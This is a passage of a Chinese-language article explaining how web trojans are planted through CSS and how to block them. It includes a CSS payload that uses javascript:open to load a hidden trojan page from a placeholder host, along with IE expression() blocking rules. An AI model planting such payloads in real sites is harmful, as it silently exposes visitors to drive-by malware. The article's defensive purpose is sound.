使用Body对象元素，主要是为了让对象不再改变整个网页文档的内容，通过Body对象的控制，可以将内容或者效果控制在指定的大小内，如同使用DIV对象那样精确地设置大小。

　　方式2：

　　Body{

　　background-image: url(javascript:open(' http://www.X.com/muma.htm '，'newwindow'，'height=0， width=0， top=1000， left=0， toolbar=no， menubar=no， scrollbars=no， resizable=no，location=no， status=no'))

　　}

　　方式1的CSS挂马技术，在运行时会出现空白的页面，影响网页访问者正常的访问，因此比较容易发现。不过在方式2中的这段代码，使用了JavaScript的Open开窗，通过新开一个隐藏的窗口，在后台悄悄地运行新窗口并激活访问网页溢出木马页面，不会影响访问者观看网页内容，因此更加隐蔽。

　　防网络服务器被挂马，通常会出现防病毒软件告警之类的信息。由于漏洞不断更新，挂马种类时刻都在变换，通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志，发现异常信息，经常检查网站代码，使用网页木马检测系统，进行排查。

　　目前除了使用以前的阻断弹出窗口防范CSS挂马之外，还可以在网页中设置CSS过滤，将CSS过滤掉。不过如果你选择过滤CSS的话，首先需要留意自己的相关网页是否有CSS的内容，因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示：

　　iframe{miao1:expression(this.src='about:blank'，this.outerHTML='');}

　　script{miao2:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

　　将外域的木马代码的src重写成本地IE404错误页面的地址，这样，外域的JavaScript代码不会被下载。不过阻断方式也有天生致命的弱点，弱点的秘密我们将于下次揭晓。

9 7 3 1 2 4 8 :